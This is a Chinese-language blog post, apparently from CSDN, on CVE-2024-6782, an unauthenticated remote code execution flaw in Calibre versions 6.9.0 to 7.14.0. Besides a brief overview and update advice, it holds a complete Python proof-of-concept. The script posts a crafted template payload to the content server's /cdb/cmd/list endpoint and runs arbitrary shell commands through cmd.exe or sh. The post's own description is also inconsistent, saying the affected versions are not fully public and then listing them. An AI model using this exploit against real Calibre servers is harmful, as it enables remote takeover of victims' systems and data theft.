Calibre远程代码执行漏洞(CVE-2024-6782)

漏洞概述

CVE-2024-6782是一个影响Calibre软件的远程代码执行漏洞。Calibre是一款广泛使用的电子书管理工具,该漏洞可能允许攻击者在受影响的系统上执行任意代码,从而可能导致数据泄露、系统控制或其他恶意行为。

漏洞影响

该漏洞主要影响Calibre的特定版本,具体版本号尚未完全公开。受影响的用户可能包括使用Calibre进行电子书管理和转换的个人用户和企业用户。

影响版本

Calibre 6.9.0 ~ 7.14.0 中不当的访问控制允许未经身份验证的攻击者实现远程代码执行。

poc

#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in 6.9.0 <= calibre <= 7.14.0
import json
import sys

import requests

_target = "http://localhost:8080"

def exploit(cmd):
    r = requests.post(
        f"{_target}/cdb/cmd/list",
        headers={"Content-Type": "application/json"},
        json=[
            ["template"],
            "", # sortby: leave empty
            "", # ascending: leave empty
            "", # search_text: leave empty, set to all
            1, # limit results
            f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
        ],
    )

    try:
        print(list(r.json()["result"]["data"]["template"].values())[0])
    except Exception as e:
        print(r.text)

if __name__ == "__main__":
    exploit("whoami")

漏洞修复

Calibre的开发团队已经发布了安全更新来修复该漏洞。建议所有用户立即更新到最新版本以确保系统安全。更新可以通过Calibre的自动更新功能或从官方网站手动下载最新版本进行安装。

漏洞来源

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值